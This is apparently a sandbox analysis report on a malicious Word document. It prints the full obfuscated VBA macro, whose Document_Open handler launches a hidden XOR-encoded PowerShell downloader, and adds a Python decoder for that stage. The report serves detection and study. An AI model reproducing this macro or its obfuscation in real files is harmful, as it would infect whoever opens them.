Verdict: MALICIOUS (risk score 222)

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1566.001 Phishing: Spearphishing Attachment
The sample contains VBA macros, including a Document_Open handler that runs when the document is opened and calls VBA.Shell() with a command string assembled at runtime from five string-building functions (QomLwriF, jKuBhYc, DoPRzTDjiBz, DhYpTKZc, NNIZaCuJqJP). The surrounding Rnd()/Sgn()/ChrW() arithmetic on undeclared variables is padding with no effect under On Error Resume Next. The assembled command is a PowerShell one-liner launched with window style 0 (vbHide, computed as 1837 - 1837): it obtains Invoke-Expression from $env:comspec[4,26,25] (the letters i, e, x of C:\Windows\system32\cmd.exe), then rebuilds its real payload by splitting a delimiter-separated list of numbers on ten case-insensitive delimiters and XORing each number with 0x45. Decoding that payload yields a download-and-execute routine (System.Net.WebClient.DownloadFile into %TEMP% followed by Start-Process), so the document is a downloader staging a secondary payload. The ClamAV detection name Doc.Malware.Valyria-6874636-0 further supports its malicious nature.
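The decoder below is an added example written for this page; it is not output of the analyzer and not code from the sample. It rebuilds the VBA.Shell() argument from the string fragments in the macros.bas preview (the constants carry the names of the VBA functions they were copied from), resolves the $env:comspec index trick against the default cmd.exe path (an assumption; the real value comes from the victim's environment), undoes the -split / -bxor wrapper the way PowerShell would, and lists the URLs in the result. It is written in Python rather than PowerShell so that nothing from the sample is ever executed.

```python
"""Offline decoder for the PowerShell stage hidden in the macro's VBA.Shell() call."""
import re

# String pieces exactly as concatenated by the macro's helper functions
# (fragments from the macros.bas preview on this page, joined in source order).
QomLwriF = (
    "HeLL . ( $env:coMSPEC[4,26,25]-jOIN'') (-jOiN('97V63<"
    "28r39~11~39N101{120V101{43V32N50~104N42V39{47~32{38r49r101~55N"
    "36s43r33~42G40{126J97V7<7x29<50{17N101G120~101N43<3"
    "2J50x104N42s39V47N32s38V49J101r22s6"
)
jKuBhYc = (
    "0V54~49~32V40s107V11G32V49x107V18V32r39r6{41G44{32s43G49~126s9"
    "7r53~47x7r14V40G101s120<101~98N45V49G49{53"
    "V127r106x106G50G50G50r107N36N43x36s41r60s49x44r38{54G107V49x45r32~40x44G4"
    "3r32s55J54r48G43x44~42V43s107s38J42s40x106r38G18J112G61s22s40s106{5J45r"
    "49N49J53<127s106V106G36<44G50{32J44V104N32N51J60N107~38V43V106N22V38s55"
    "<44G53s49V54~106{117x33<39G35x106J5J45V49N49{53<127J106N106{"
    "124<118J107<112<116N107V116x118V119<107x116s119x113V106"
)
DoPRzTDjiBz = (
    "V117N49J32V8{63<113r36x106N5r45s49{49J53<127<106x106{50V50<50<107G34G32G32V44~40~107N38r4"
    "2V40V106x33~49x36x60<116<106J5~45~49{49r53x54G127J106x106{32<52~50G42r41N35V107<38V42x40N106s32V51J32N106s"
    "53N13N11N17<4~106r98x107~22N53"
    "G41J44r49x109{98N5~98{108s126r97J38J10r2G42<42V101r12"
    "0V101G97x63J28s39J11V39N107~43G32r61N49G109r"
    "116<105V101J124~112s115s125~113s112{108x126~97<43~13x40N36x16N45{101N120r"
    "101s97s32V43x51r127r49{32s40r53~101G110{101J98r25~98N101J110J101"
    "x97r38V10V2G42N42V101s110s101~98J107s32x61x32r98x126J35{"
)
DhYpTKZc = (
    "42<55{32J36~38~45{109N97G8{40~40r44G45V101{44~43J101x97N53r47V7{14s40"
    "s108x62r49{55<60V62<97{7~7x29J50x17<107N1V42N50"
    "G43N41G42x36{33<3N44V41V32G109G97~8r40J40<44{45"
    "J107V17<42<22N49<55x44G43V34J109V108<105N101G97x43~13x40V36<16r45r108s126{22x49{36<55J49{104{21"
    "<55J42s38<32r54<54r101~97s43r13r40G36x16V45<126x39J55~32N"
    "36N46G126N56{38r36G4"
    "9r38G45~62x50V55s44G49s32<104x45N42r54G49N101r97<26J107V0G61s38{32r53~49N44x42J43r107x8J32~5"
    "4~54r36G34<32s126N5"
    "6s56' -SplIt'X' -SPLiT'r'-SpLIT 'v' -splIt 'J' -SpLIT'{' -SpLI"
)
NNIZaCuJqJP = "t '<'-SPLit'S'-splIt 'N' -SPlIt'~'-spLIT 'g'|% {[chAr]( $_-bXoR 0x45 )}) )"


def shell_argument() -> str:
    """First argument of VBA.Shell() in huQWaidES().

    Chr(DuqCroSPz + vbKeyP + vVztTjhcZs): the two undeclared names are Empty (0)
    under On Error Resume Next and vbKeyP is 80, so Chr() yields "P"; vnBsN is
    Empty as well.  The second argument, 1837 - 1837, is 0 = vbHide.
    """
    return "P" + "owers" + QomLwriF + jKuBhYc + DoPRzTDjiBz + DhYpTKZc + NNIZaCuJqJP


def comspec_index_trick(expr: str, comspec: str = r"C:\Windows\system32\cmd.exe") -> str:
    """Resolve $env:comspec[i,j,k] -join '' against the default cmd.exe path (assumed)."""
    m = re.search(r"\$env:comspec\[([\d,]+)\]\s*-join\s*''", expr, re.IGNORECASE)
    return "".join(comspec[int(i)] for i in m.group(1).split(",")) if m else ""


STAGE_RE = re.compile(
    r"-join\('(?P<blob>[^']*)'"                      # quoted list of numbers
    r"(?P<splits>(?:\s*-split\s*'[^']')+)"           # chain of -split '<delim>'
    r"\s*\|\s*%\s*\{\[char\]\(\s*\$_\s*-bxor\s*0x(?P<key>[0-9a-f]+)\s*\)\}",
    re.IGNORECASE,
)


def decode_stage(cmd: str) -> dict:
    """Undo the -split / -bxor wrapper and return what Invoke-Expression would run."""
    m = STAGE_RE.search(cmd)
    if not m:
        raise ValueError("no -split/-bxor stage found in command")
    delims = re.findall(r"'([^'])'", m.group("splits"))
    key = int(m.group("key"), 16)
    # PowerShell -split uses a case-insensitive regex by default, so 'v' also splits on 'V'.
    tokens = re.split("[" + re.escape("".join(delims)) + "]", m.group("blob"), flags=re.IGNORECASE)
    plaintext = "".join(chr(int(t) ^ key) for t in tokens if t)
    return {
        "invoker": comspec_index_trick(cmd),
        "key": key,
        "delimiters": delims,
        "script": plaintext,
        "urls": re.findall(r"https?://[^'@\s]+", plaintext),
    }


if __name__ == "__main__":
    result = decode_stage(shell_argument())
    print("invoker:", result["invoker"], "xor key:", hex(result["key"]))
    print(result["script"])
    for url in result["urls"]:
        print("url:", url)
```

Running it prints the decoded stage: a script that creates a System.Net.WebClient, walks a list of five URLs separated by "@", downloads the first one that answers to %TEMP%\<random number>.exe and launches it with Start-Process. Those five URLs are the network indicators worth blocking; the schemas.openxmlformats.org URL the analyzer lists under EMBEDDED_URL is a standard OOXML namespace identifier, not a contact address.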
Heuristics (6)

- CLAMAV_DETECTION (critical): ClamAV detected this file as malware: Doc.Malware.Valyria-6874636-0
- OLE_VBA_MACROS (medium, 3 related findings): Document contains VBA macro code
- OLE_VBA_SHELL (critical): Shell() call in VBA. Matched line in script:
    JKuzj = Rnd(hcwpWj)
    huQWaidES = HOzfXt + VBA.Shell(vnBsN + Chr(DuqCroSPz + vbKeyP + vVztTjhcZs) + "owers" + QomLwriF + jKuBhYc + DoPRzTDjiBz + DhYpTKZc + NNIZaCuJqJP, 1837 - 1837)
    vJDzz = 94368 + CFzOT
- OLE_VBA_DOCOPEN (high): Document_Open macro. Matched line in script:
    End Function
    Private Sub Document_open()
    On Error Resume Next
- OLE_VBA_PCODE_AUTOEXEC_EXEC (high): VBA p-code auto-exec with execution tokens. The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens; this catches p-code-only or source-extraction-failure macro documents where the visible source is unavailable.
- EMBEDDED_URL (info): Embedded URL. One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10298 bytes | 041cb49e887ad84f2492cfdd1a53127ac36a2aee081ef818f9ea7e0d8c405bdd |

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "WnhUMPbktu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function huQWaidES()
On Error Resume Next
AqNrEU = 10958 + HISku
qdViX = (26648 * Sgn(buWhGP) / 95749 / OvHwCH * FFOZi + ChrW(RGGmFn) / imnMj * CInt(VhjiE))
wbDMLX = QZGlRP
XNsqf = Rnd(rIRZw)
wjrJo = 32268 + AbkTcI
RtimGW = (43905 * Sgn(wMLtP) / 67360 / jOziD * ENXtzp + ChrW(iDaCt) / dHzwMF * CInt(hTnboI))
QzmhYa = QfQHu
wSKLd = Rnd(MJaYQ)
ftlIz = 53836 + wjPmc
sQbqF = (10833 * Sgn(VBaBS) / 77357 / mIACdw * ubFKn + ChrW(kNhHa) / wjoVsJ * CInt(EwzLYd))
AlavF = zCzlKd
FkRQZr = Rnd(MfGsHh)
pnITS = 52299 + qzzmIs
wVlzzM = (83030 * Sgn(Rofszq) / 51458 / MHork * zDZowv + ChrW(Noivho) / MwnvB * CInt(aoPXk))
rcvQhh = GZTkX
JKuzj = Rnd(hcwpWj)
huQWaidES = HOzfXt + VBA.Shell(vnBsN + Chr(DuqCroSPz + vbKeyP + vVztTjhcZs) + "owers" + QomLwriF + jKuBhYc + DoPRzTDjiBz + DhYpTKZc + NNIZaCuJqJP, 1837 - 1837)
vJDzz = 94368 + CFzOT
OYfziY = (57193 * Sgn(GuXoSa) / 39490 / puwsCq * uJtZFF + ChrW(VCWJir) / GVqpK * CInt(mrWVak))
pjOLnB = IzoBc
vuMMvj = Rnd(JVhaK)
dKZVS = 15701 + cRjYIC
KwlQk = (82689 * Sgn(hYMWE) / 26305 / HCaVuh * QEiCMA + ChrW(sYwVf) / ijfSoR * CInt(KidjiK))
HqCmYw = klbzm
JuCkk = Rnd(vlpkz)
End Function
Private Sub Document_open()
On Error Resume Next
qOozO = 2083 + izaWI
QaBopc = (8497 * Sgn(bXViP) / 59887 / fQnLD * cJwMQ + ChrW(tVFYi) / VlwcLl * CInt(DRBYMw))
cwihbC = CkpKN
NiLFF = Rnd(jurDO)
bKuVw = 82105 + tuJCEB
jbBzh = (49013 * Sgn(LSsXjZ) / 42397 / RcCUP * jLMMj + ChrW(NVzdu) / cKVswc * CInt(UqzGku))
zHakl = Edhzl
XLWTC = Rnd(KUnRDb)
huQWaidES
HWqUP = 54100 + wLfZjZ
MHKGD = (22329 * Sgn(VwzfrI) / 93607 / DjMUF * cLSKMS + ChrW(FUIXRL) / pBZWUw * CInt(vKBNT))
uKjEcS = CBiwz
PMmAf = Rnd(WVzPpk)
wPdrHZ = 92870 + YCHqz
jBtJd = (62353 * Sgn(BGSTtn) / 45402 / ivNfc * LDvawz + ChrW(aHdEMz) / KftdJ * CInt(GKOjX))
RjARz = wWHAmv
HwUVc = Rnd(cjwrvq)
End Sub
Attribute VB_Name = "VloMmGSp"
Function QomLwriF()
On Error Resume Next
mBZlT = kTVSkh
AKLmTG = Rnd(pRsSSX)
vvkpLh = (33978 * Sgn(jEpVuO) / 94722 / lZvld * PThwz + ChrW(VsOJoL) / HWkBqD * CInt(FwjPZM))
oNjuW = 90714 + CHZNYV
SBiEVB = "HeLL . (" + " $" + "env:coMSPEC[" + "4,26," + "25]-jOIN" + "'') (" + "-jOiN(" + "'9" + "7V63<"
TjSZlv = IVTsF
QjspwG = Rnd(fQHMji)
bFdoHU = (47014 * Sgn(FEhqc) / 94491 / iVlOGt * honwn + ChrW(fVLpdw) / aXiwN * CInt(fNfkiI))
nqfhi = 68041 + jBXEhz
MqqQjTV = "28r39~11~3" + "9N101{120" + "V101{43V32N50" + "~104N42V39" + "{47~" + "32{3" + "8r49r101~55N"
wCEEp = dEVdLi
VaAidz = Rnd(OYoBJh)
ABihn = (61647 * Sgn(tcnrU) / 53738 / MPNtc * iPWkw + ChrW(suhPO) / jchHbE * CInt(UcUWO))
mkssN = 62394 + JKmoBf
WUQUf = "36s43r33~" + "42G40{12" + "6J97V7<7x2" + "9<50{17N101G1" + "20~101N43<3"
IsHrKt = XMFTd
kNYRp = Rnd(jiKYk)
IiwZEw = (53740 * Sgn(ThhVJJ) / 81189 / wOpNB * rbTOrY + ChrW(YOUiTE) / MMumcK * CInt(LaVAkR))
wkTnHL = 25289 + KlwiE
hIhjV = "2J" + "50x104" + "N42s3" + "9V47N32s3" + "8V4" + "9J101" + "r22s6"
QomLwriF = SBiEVB + MqqQjTV + WUQUf + hIhjV
End Function
Function jKuBhYc()
On Error Resume Next
rJjAzN = HEKXq
NqdQq = Rnd(nWGpF)
duGqF = (9492 * Sgn(ZHtsNi) / 20163 / UiaWZf * AHWIbw + ChrW(wkvVdN) / pwjPW * CInt(jPomS))
CvSMr = 81006 + womUD
zwvMY = "0V54~49~" + "32" + "V40" + "s107V11G32V4" + "9x107" + "V1" + "8V32r39r6{41G44" + "{32s43G49~126s9"
DUOlT = pYXJcA
amVkB = Rnd(hiuzU)
EviPqi = (68455 * Sgn(niaGru) / 33448 / EHmpt * NPIjk + ChrW(ELUjI) / nFOHo * CInt(KVQmn))
djdJJw = 85213 + zWiju
ipqBj = "7r53~47x7r" + "14V4" + "0G1" + "01s120<101~98" + "N45V49G49{53"
fYzaci = vimtS
boYSSB = Rnd(KAriSG)
wCwXwA = (57209 * Sgn(iooYt) / 62513 / iNaVhJ * btHqcG + ChrW(tuiuEz) / KnvwqU * CInt(kJCizR))
tchbN = 88998 + oGLrzT
wtdncVXj = "V127r106" + "x106G50G50G50r" + "107" + "N36N43" + "x36s41r60" + "s49x44r38{54" + "G1" + "07V49x45" + "r32~" + "40x44G4"
hrkEHi = kYiLJX
VMXlj = Rnd(aCQFY)
MHWpXS = (10842 * Sgn(qDYtR) / 32608 / wjwuql * SLwuii + ChrW(LuURz) / QCqBYj * CInt(AhjOM))
OotFd = 79558 + AXZfZr
dYatnNQ = "3r32s55J5" + "4r48G43x44~42V" + "43s107" + "s38J42s40x106r" + "38G18J11" + "2G61s22s40s1" + "06{5J45r"
ikfjh = jnJiF
ucCMO = Rnd(vdpLrd)
DKarzY = (79558 * Sgn(jVZbm) / 89984 / ViMQta * vFfHvY + ChrW(EVazqO) / wCqYj * CInt(jMLEzn))
bsiIEb = 34384 + ZtpwVG
sJwmd = "49N49J53<127" + "s106V10" + "6G36<44G50{32J4" + "4V" + "104N32N51" + "J60N1" + "07~38V43" + "V106N22V38s55"
DjtbJH = czYIn
OFzSL = Rnd(UOVMs)
tEdqzv = (29263 * Sgn(FMMbBG) / 77973 / YbawiR * bkiVIp + ChrW(cqoPmX) / qYwwvz * CInt(hzHBT))
QRbAzc = 91417 + bWjWrN
IOCFCjjDPb = "<44G53s49V" + "54~106{117" + "x33<3" + "9G35" + "x10" + "6J5J45" + "V49N49" + "{53<127J106N1" + "06{"
tlbTp = AfJzS
awhpzc = Rnd(BFPZG)
wslIW = (84025 * Sgn(UmMMV) / 64323 / lstDp * JPHUo + ChrW(RmcEM) / UKSGwu * CInt(IiwVh))
djVmmT = 32801 + iCdAnT
nzpRhH = "124<1" + "18J1" + "07<11" + "2<116N107V116x1" + "18V119<107x116s" + "119x11" + "3V106"
jKuBhYc = zwvMY + ipqBj + wtdncVXj + dYatnNQ + sJwmd + IOCFCjjDPb + nzpRhH
End Function
Function DoPRzTDjiBz()
On Error Resume Next
zwjbKu = viTiSU
GmmTI = Rnd(FKHAik)
GcMJj = (42735 * Sgn(ZqiQHn) / 63230 / FPCpMl * ijpoK + ChrW(mzvzX) / tznNB * CInt(PaGwK))
UQaSr = 66027 + ZAXki
KRYWuJj = "V117N49J32V8{" + "63<113" + "r36x106N5r" + "45s49{49J5" + "3<127<106x106" + "{50V50<50<107G3" + "4G32" + "G32V44~40" + "~107N" + "38r4"
BjwKB = WmiRXJ
GtzcE = Rnd(dIhwwf)
SWOhvz = (15286 * Sgn(GwEnNL) / 87255 / iFwKC * wLXwSJ + ChrW(MunczU) / VrsCJH * CInt(ksWoUc))
uLLms = 74918 + kYnBR
GqFJI = "2V40V10" + "6x33~49x36x" + "60<116<106J5~" + "45~49{49r53" + "x54G127J106x10" + "6{32<52~50G" + "42r41N35V10" + "7<38V42x4" + "0N106s32V51J32N" + "106s"
MTAIwj = MjMdJ
zLbzq = Rnd(ZDJwjw)
UShtVL = (91296 * Sgn(iaLad) / 58175 / Izhzv * NjJqh + ChrW(whTEh) / MdfJU * CInt(pzhis))
uCRLN = 82451 + zqNtBv
imTwkHicz = "53N13N11N17<4" + "~106r" + "98x" + "10" + "7~22N" + "53"
Ivbjr = HMOFd
iVCsEl = Rnd(fOVHiX)
aBqrWz = (72782 * Sgn(kvCNP) / 43362 / MECCE * VXStX + ChrW(Cvbfrp) / vdfYis * CInt(LZMtN))
nuzTP = 42329 + VQApzc
sfRWoYsL = "G41J4" + "4r49x109{98" + "N5~98" + "{108s126" + "r97J38J10" + "r2G42<42V101" + "r12"
KrzvL = fDWqz
ULvHM = Rnd(YYFdY)
SoRJq = (99458 * Sgn(ajldp) / 31304 / ipntfN * oshaJR + ChrW(TujtWp) / WGXkja * CInt(rYNIf))
wGjWIP = 21163 + hbjhf
qZLqcza = "0V101G97x63J" + "28s3" + "9J11V" + "39N107~43G" + "32r61N49G109r"
zUTSd = IdiGi
qpQcL = Rnd(rdvkij)
zSbWoE = (98340 * Sgn(wGWdp) / 9190 / fGAUM * UjbQQC + ChrW(zdGvCi) / jkMbEz * CInt(Yrzqd))
HHlCkT = 51664 + LiPIwn
DLHzM = "116<105V101J124" + "~112s115s12" + "5~113s11" + "2{108x126~9" + "7<43~13x40N36x" + "16N45{101N120r"
Ndvpd = mdqVGc
ndXdm = Rnd(ldmzG)
jwzuk = (11506 * Sgn(CiBEr) / 43198 / XzFic * WHIhz + ChrW(flXdz) / WSuJc * CInt(JoWMic))
BUTUz = 52305 + GbiuuZ
SKKkNNbZjV = "101s97s32V43x5" + "1r127r49{3" + "2s" + "40r53~1" + "01G110" + "{101J98r2" + "5~98N101J" + "110J101"
ohJYj = zOUVrs
zHLPjl = Rnd(dYlZoS)
lwjUU = (19011 * Sgn(uOEhiY) / 3787 / DpBLUN * qcAIcz + ChrW(FwoIt) / WXAtL * CInt(iaccq))
OaRfAE = 80439 + DVOUR
TwSdZZRFf = "x9" + "7r3" + "8V10V2G" + "42N42V101s" + "110s" + "101~98J107" + "s32x61x" + "32r98x126J35{"
DoPRzTDjiBz = KRYWuJj + GqFJI + imTwkHicz + sfRWoYsL + qZLqcza + DLHzM + SKKkNNbZjV + TwSdZZRFf
End Function
Function DhYpTKZc()
On Error Resume Next
AujON = JApZp
nXLiT = Rnd(XwwHEU)
cIkwIO = (36523 * Sgn(iifjRT) / 66221 / dqSfp * fdNhu + ChrW(KKrUE) / jlohoq * CInt(KaWPz))
huuII = 87845 + izFjp
bIFLwPDOFlD = "42<55{32J36" + "~38~45{1" + "09N97G" + "8{40~40r44G4" + "5V101{44~43" + "J101x97N53r" + "47V7{14s40"
ilION = AmRnsN
tRsXwH = Rnd(lQdHj)
wQIhwN = (41678 * Sgn(oCkEUO) / 12694 / Qcwfs * iUtVr + ChrW(bDjtw) / mWpuwo * CInt(TqjYJ))
UOVXmK = 59629 + nzcvBb
oTnGzhm = "s1" + "08x62r49{" + "55<60V62<97" + "{7" + "~7x29J50x17<1" + "07N1V42N50"
YQvwj = WaJCYz
VtSBLv = Rnd(Cqlnod)
iwkBF = (37577 * Sgn(EzEQi) / 4208 / tJmif * JdZqrE + ChrW(zaMju) / tBfzdQ * CInt(oUbLf))
BWlSq = 14351 + bjfWfI
oXHOK = "G43N41" + "G42x36{33<3N" + "44V" + "41V32G1" + "09G9" + "7~8" + "r40J40<44{" + "45"
OUwpB = LdXiX
hScQW = Rnd(sKEFW)
qLBio = (93383 * Sgn(ETPtU) / 80599 / qJYYKO * NIYLP + ChrW(Jihdj) / TtJUHU * CInt(FGqza))
KBSTik = 41154 + pJHNK
NYUKX = "J107V17<42<22N" + "49<55x4" + "4G43V34J109" + "V108<105N101G97" + "x43" + "~13x40V36<16" + "r45r108s126{22x" + "49{36<" + "55J49{104{" + "21"
DzJzW = zhPul
zJXCEz = Rnd(IEdCc)
ciLoPQ = (12810 * Sgn(jvSFkE) / 25979 / GdLqO * vYzFGt + ChrW(pJwNpJ) / wjGha * CInt(hHhDPS))
YszVl = 72498 + YVzjo
CRUSi = "<55J42s38<32r54" + "<54r101~" + "97s4" + "3r13r40G36x16V4" + "5<126x39J55~32N"
Forwp = wwOXQS
hblivS = Rnd(imoKKN)
UYLuw = (44429 * Sgn(jnUNL) / 38837 / qPEOE * AjtvsU + ChrW(QOfPD) / YahGb * CInt(HDiRTd))
tmTsv = 90067 + RWXiQ
VFpkc = "36N46G1" + "26N" + "56{38" + "r36G4"
nwbSRa = HwFJf
VQGiJI = Rnd(nVkfQ)
GqmCp = (4002 * Sgn(ZzGHNJ) / 27237 / zZTzZ * UPLDTF + ChrW(tcumpm) / TwtHGT * CInt(oqUFI))
bAwUI = 10837 + lvzIJ
BCWaIoDMsD = "9r" + "38G45~62x50V55s" + "44G49s32<104x" + "45N42r54G49" + "N101r97<" + "26J107V0G61s" + "38{32r53~49N" + "44x42J43r107" + "x8J32~5"
rGcjZ = zLtzlD
wIZmL = Rnd(olaaz)
ajzNt = (45457 * Sgn(lJbXSi) / 98477 / lwzHtb * zLFBj + ChrW(LDruS) / uoYBG * CInt(lahfFO))
zrjWL = 40207 + WPzBj
ivZiwfVQoYi = "4~54r" + "36G3" + "4<" + "32s126N5"
AnUGr = qllHs
sQZwzi = Rnd(hGkmH)
IWnEm = (87586 * Sgn(pszbv) / 54868 / SnXMA * ADjTQ + ChrW(QkzHow) / MrFRoa * CInt(foOAL))
osaFjc = 98882 + FsNvtd
EDHXXRdIUqB = "6s56' -SplIt" + "'X' -SPLiT'r" + "'-SpLIT 'v' " + "-sp" + "lIt 'J' -S" + "pLIT'{' -SpLI"
DhYpTKZc = bIFLwPDOFlD + oTnGzhm + oXHOK + NYUKX + CRUSi + VFpkc + BCWaIoDMsD + ivZiwfVQoYi + EDHXXRdIUqB
End Function
Function NNIZaCuJqJP()
On Error Resume Next
jlzaM = fHrBnv
dcoDN = Rnd(GmPEp)
uPrEzm = (30219 * Sgn(ATYAwd) / 79755 / VOFbhi * HLCPKN + ChrW(Fpiwrw) / wRkzZj * CInt(aaPLp))
oGdir = 71432 + dDPXN
aNioJEuwIk = "t '<'-SPL" + "it'S'-splIt 'N" + "' -SPlIt'~" + "'-spLIT 'g'|" + "% {[chAr]( $_-" + "bXoR 0x45 " + ")}" + ") )"
NNIZaCuJqJP = aNioJEuwIk
End Function